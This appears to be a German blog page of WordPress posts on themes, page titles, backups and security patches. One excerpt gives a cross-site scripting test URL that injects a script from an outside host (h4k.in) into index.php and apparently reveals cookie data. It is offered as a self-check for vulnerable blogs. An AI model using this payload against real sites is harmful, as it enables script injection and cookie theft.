Peruns Weblog - Webwork und Internet

Ich habe bereits heute Nachmittag den Hinweis auf die Beiträge bei TecChannel.de bekommen (hier und hier). Es ist nämlich so, dass Benjamin Flesch in WordPress 2.2.1 sieben Lücken entdeckt hat und dafür einen freundlich gesinnten Wurm geschrieben hat, der die Lücke nicht ausnutzt sondern stopft. Das finde ich löblich und es zeugt von Charakter.

Auch Frank Bültge hat zu diesem Thema ein paar Worte geschrieben. Ob man den freundlichen Wurm die Arbeit erledigen lässt, es in den Dateien selbst ausbessert oder auf den offiziellen Patch wartet muss jeder für sich selbst entscheiden.

Mit diesem Artikel werde ich eine kleine Artikel-Serie starten in der ich den Aufbau der WordPress-Themes beschreibe. Speziell in diesem Artikel werde ich etwas Theorie einbringen und vor allem Begriffe aus dem Bereich der WordPress-Themes erklären.

An der einen oder anderen Stelle wird ich auch auf Einsteiger-Themen eingehen, der erfahrene WordPress-Nutzer möge mir dies verzeihen. Aber ich würde ungern, die Leser mit etwas weniger Erfahrung aussperren. Im zweiten Teil werde ich das Classic-Theme erklären und im dritten Teil den Aufbau dieses Weblogs. weiterlesen…

Die neuen Versionen von Wordpress (2.0.10. und 2.1.3) stopfen auch ein paar Sicherheitslücken. Jens hat mich vor ein paar Tagen auf eine Demo aufmerksam gemacht in dem man herausfinden kann ob ein Weblog bedroht ist oder nicht. Einfach an die Domain seines Weblogs folgendes in der Adressleiste dranhängen:

index.php?year=%22%3E%3C/title%3E%3Cscript%20src=

http://h4k.in/j.js%3E%3C/script%3E

und aufrufen. Da die Zeile zu lang ist musste ich sie umbrechen, eigentlich muss alles in eine Zeile. Wenn du dann anstatt deiner Website irgendetwas mit XSS und jede Menge komischer Daten siehst, dann hat dein Weblog eine Lücke. Bei den ausgelesenen Daten handelt sich meiner Meinung nach um die Daten aus dem Cookie.

Wie gesagt, die neuen Versionen stopfen die Lücke und schon seit einiger Zeit konnte man sich die gepatchten Dateien auch einzeln herunterladen. Mich hat es aber gewundert warum bei mir trotz des Patches die Lücke noch vorhanden war. Da die Lücke auf den title-Tag abzielt habe ich daher als erstes das Plugin "Optimal Title" deaktiviert und diese Lücke war nicht mehr vorhanden.

In wie fern es sich hier um eine kritische Sicherheitslücke handelt, dass kann ich nicht sagen. Wer aber auch ohne das o.g. Plugin die Seitentitel so ausgeben möchte das zuerst der Beitragstitel und dann der Name der Website auftaucht – gut für Lesezeichenverwaltung und für die Suchmaschinen – der schaue sich bitte den Beitrag Optimaler Seitentitel in Wordpress und die Kommentare an.

Ein guter Seitentitel ist sehr wichtig. Ich rede hierbei von dem Titel welcher sich oben in der Browserleiste befindet und durch das title-Element ausgezeichnet wird. Hier eine Abbildung:

Ein Aussagekräftiger Titel ist wichtig für den Besucher und zwar in zweierlei Hinsicht. Zum einen als Orientierung innerhalb der Website und zum anderen wird der Seitentitel bei den diversen Lesezeichen-Verwaltungen auch als Lesezeichen-Titel übernommen. Auch in Bezug auf die Optimierung einer Website für die Suchmaschinen ist der Seitentitel extrem wichtig. Da die Suchmaschinen den Seitentitel stark bewerten und weil bei der Auflistung des Suchergebnisse der Seitentitel benutzt wird. weiterlesen…

Da auch ich, obwohl ich Wordpress schon sehr lange nutze, manchmal überlegen muss wo sich etwas im Admin-Bereich befindet, habe ich überlegt, dass ganze Menü aufzulisten und mir kurzer Stichwortartiger Erklärung zu versehen. Damit hat man es in kompakter Form und kann es sich ausdrucken und neben dem Rechner stellen. weiterlesen…

Viele Hoster bieten in den Paketen schon installiertes PHPMyAdmin. Hierbei handelt es sich um ein PHP-Skript mit dem man die MySQL-Datenbank verwalten kann. Dies kommt auch den Wordpress-Nutzern zu Gute. Und zwar in zwei konkret wichtigen Fällen: Backup (Sicherung) und im Falle wenn man als Admin das Paßwort vergessen bzw. verlieren sollte.

Anleitung für diese beiden und weitere Fälle in Verbindung von Wordpress und PHPMyAdmin gibt es bei Podz. Für Leute die gerne für das Backup ein Plugin haben wollen, werden u.a. hier fündig. Falls jemand gerne auch ein Screenshot der Backup-Optionen in deutscher Sprache sehen will, der kann dies hier tun.

Jetzt könnte von einer oder anderen Seite der Einwand kommen, daß man das Paßwort garnicht verlieren kann. Denn WP sendet automatisch das Admin-Paßwort an die eingegebene Mailadresse und nachher kann man sich, falls man es vergessen sollte, zuschicken lassen. Stimmt schon, aber die Mailingfunktion funzt z. B. nicht auf einem Windows-Server. Auf die schnelle das Fenster mit der abgeschlossenen Installationsroutine geschlossen und sich aus Versehen ausgeloggt … und schon steht man ohne Zugang da. Ich rede aus eigener Erfahrung .

In dem Bericht "Wordpress als CMS: ein Beispiel" habe ich bereits einen Fall geschildert wie man Wordpress auch als "klassisches" Redaktionssystem einsetzen kann. Nun werde ich ein zweites Beispiel aus der Praxis liefern.

Aber vorab ein paar grundlegende Sachen bevor ich mit dem Beispiel fortfahre, da ich aus den Trackbacks und verweisenden Seiten einiges zu diesen Bericht gelesen habe.

Erster Punkt: Wenn ich Redaktionssystem sage, dann meine ich ein webbasiertes System mit dem ich Inhalte online verwalten kann. In einem Forum habe ich mitbekommen wie sich einige User (in Anlehnung an den ersten Bericht) über die "richtige" Definition eines Redaktionssystems unterhalten haben.

Zweiter Punkt: die Aussage viele Wege führen nach Rom gilt auch bei Wordpress . Ich sage nicht das meine Ausführungen der Weisheit letzter Schluss sind, es sind nur praktische Erfahrungen. Evtl. kennt jemand elegantere Möglichkeiten zum Ziel zu gelangen.

Dritter Punkt: im ersten Beispiel habe ich die Hauptnavigation "manuell" ausgegeben und zwar nicht weil ich nicht weiß wie man sie automatisch ausgibt, sondern weil der Kunde wollte das der aktuelle Navipunkt hervorgehoben wird.

OK, nun kommen wir zum Beispiel. weiterlesen…